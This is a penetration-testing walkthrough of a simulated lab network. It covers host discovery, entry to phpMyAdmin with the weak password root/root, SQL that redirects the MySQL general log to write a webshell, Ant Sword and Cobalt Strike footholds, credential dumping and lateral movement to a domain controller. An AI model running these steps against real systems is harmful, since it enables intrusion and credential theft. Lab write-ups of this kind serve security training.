Network configuration
Win7 is used as a web server, and the other two computers are in the intranet and can access each other.
win7
Contains two network cards, one of which is VM13 for the internal network, and the other is NAT for connecting to the external network.
win 2008
win 2K3
IP allocation
win7
Extranet
Intranet
win 2008
win 2K3
kali
Host |
IP |
win7 |
192.168.109.134 |
win7 |
192.168.52.143 |
win 2008 |
192.168.52.138 |
win 2K3 |
192.168.52.141 |
kali |
192.168.109.132 |
Host |
192.168.109.1 |
You can see that kali and win7 are on the same physical network
Interoperability
Use the host to ping three intranet machines respectively.
The interoperability is as follows:
win7 and intranet host ping
The result is as follows:
You can see that the hosts on the internal network are communicating with each other, but the external network cannot access the internal network.
Service started
Open phpstudy in win7
Open in browser
Access 192.168.109.194 on the host browser
Detection target
Kali comes with an arp scanner. You can use this tool to scan out hosts on the same network segment as your own network card.
arp-scan -l #Scan all hosts in the network segment
arp-scan -I eth0 -l #Scan all IP addresses in the specified network segment
Use root privileges to scan and quickly discover hosts on the same network segment.
Scan directories
Use Edgeworth to scan the directory and you can see this information
Enter phpMyAdmin
Click the URL above to enter the interior
Use the weak password root/root to enter
Here we use phpmyadmin log to write the shell. First check whether the log is enabled.
The conditions for writing are as follows:
- root authority
- Know the absolute path
- secure_file_priv has no specific value
show global variables like “%secure%”; to check whether the log is enabled
You can see that it is not turned on, and secure_file_priv has no specific value.
Next, open the log and write the absolute path
set global general_log=”on”;
#Turn on the log and change it to on
set global general_log_file=”C:/phpStudy/WWW/1.php”;
#Modify the log path (there is a leaked path in phpinfo.php mentioned above)
Write a sentence Trojan
SELECT ”
Connect using Ant Sword
Added successfully, then you can operate it
The commands that can be operated are as follows:
whoami # View current username whoami /all # Get domain SID ipconfig /all # Network configuration file route print # Print routing information arp -a # Check the arp cache to find the intranet host systeminfo # operating system information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # Operating system and software version information systeminfo | findstr /B /C:"OS name" /C:"OS version" # Operating system and software version information (Chinese) echo %PROCESSOR_ARCHITECTURE% # System architecture wmic product get name,version # System installed software and version information wmic service list brief # Local service information tasklist /v # native process net statistics workstation # Host boot time schtasks /query /fo LIST /v # Scheduled tasks net user # View local users net localgroup administrators # View the local administrators group (usually includes domain users) net user xxx # View detailed information of the specified user
Use CS to create a listener to upload and connect to the Trojan
Already connected to the host using Ant Sword
Next create a CS listener and then create a Trojan horse file
Use Ant Sword to upload and open
Proceed as follows:
You can see that the creation was successful
Save it to desktop
Upload using Ant Sword
Click to upload the file and select the Trojan you just made
You can see that the upload was successful
At this time, use Ant Sword and run shell.exe in the terminal.
You can see that the host is online above the listener
Right click and change the sleep interval
Information collection
Right click to enter Beacon
shell hostname query host name
shell net users View user list
shell net config Workstation view domain
shell net localgroup administrators View domain management
shell net group “domain admins” /domain View domain control
View a list of all domain member computers
Find domain administrator
net view to view the current domain list
After checking, click to see the hosts in the current domain.
Elevation of privilege
First grab the server credentials
Click Dump Hash
Then grab the clear text password
Use plug-ins (you can privately message me if you need plug-ins)
At this time you can see a SYSTEM*, which has root permissions
Lateral movement
Create smb listener
Move laterally and use the credentials you just obtained to create this domain control
Take down the domain controller, and then use the domain controller to create the remaining host